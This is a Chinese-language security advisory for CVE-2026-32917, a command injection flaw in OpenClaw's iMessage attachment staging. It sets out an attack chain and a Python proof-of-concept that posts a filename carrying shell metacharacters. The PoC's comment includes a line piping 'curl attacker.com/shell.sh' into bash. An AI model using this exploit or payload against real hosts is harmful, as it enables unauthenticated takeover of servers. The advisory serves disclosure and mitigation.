CVE-2026-32917 CVSS 9.8 严重

CVE-2026-32917 OpenClaw远程命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32917

漏洞类型

远程命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.13之前版本存在远程命令注入漏洞。该漏洞位于iMessage附件暂存流程中，由于未对远程附件路径进行充分过滤，导致包含Shell元字符的路径被直接传递给SCP命令。攻击者无需认证即可利用此漏洞在配置的远程主机上执行任意系统命令。

技术细节

漏洞的根源在于OpenClaw在处理iMessage附件暂存时，直接将用户可控的远程附件路径拼接到SCP命令中进行执行，未进行任何输入清理或验证。攻击者可以构造包含Shell元字符（如分号、反引号、管道符等）的恶意文件名。当系统调用Shell执行SCP命令时，这些元字符会被解析为命令分隔符，从而导致攻击者注入的命令在服务端上下文中被执行。由于漏洞利用无需用户交互且无认证要求，攻击者可轻松控制服务器。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或通过搜索引擎寻找暴露在互联网上的OpenClaw实例，并确认其版本是否低于2026.3.13。

STEP 2

2. 构造载荷

攻击者构造包含Shell元字符（如 ';', '`'）的恶意附件路径字符串，旨在绕过常规文件名限制并注入操作系统命令。

STEP 3

3. 发送恶意请求

攻击者向OpenClaw的iMessage附件暂存接口发送特制的数据包，其中包含构造好的恶意路径。

STEP 4

4. 命令执行

OpenClaw服务端在处理请求时，将恶意路径直接传递给SCP命令。Shell解析元字符并执行攻击者注入的任意命令。

STEP 5

5. 建立控制

攻击者利用执行的命令下载后门、窃取敏感数据或进一步横向移动，完全控制受影响的主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-32917 (OpenClaw Remote Command Injection)
Vulnerability: Unsanitized user input in SCP path allows RCE.
"""

import requests

def exploit_poc(target_ip, malicious_command):
    # The vulnerable endpoint expects an attachment path
    url = f"http://{target_ip}:8080/api/stage-attachment"
    
    # Constructing a malicious filename with shell metacharacters
    # Example: `; id;` or `; curl attacker.com/shell.sh | bash;`
    malicious_payload = f"normal_file.txt; {malicious_command}; #"
    
    data = {
        "remote_path": malicious_payload,
        "host": "localhost"
    }
    
    try:
        print(f"[*] Sending payload to {target_ip}...")
        response = requests.post(url, json=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check if command executed.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    target = "192.168.1.10"
    cmd = "touch /tmp/openclaw_pwned"
    exploit_poc(target, cmd)

影响范围

OpenClaw < 2026.3.13

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用OpenClaw中的iMessage附件远程暂存功能，以阻断漏洞利用路径。同时，应严格审查系统日志，检查是否存在异常的SCP进程调用或可疑的命令执行记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表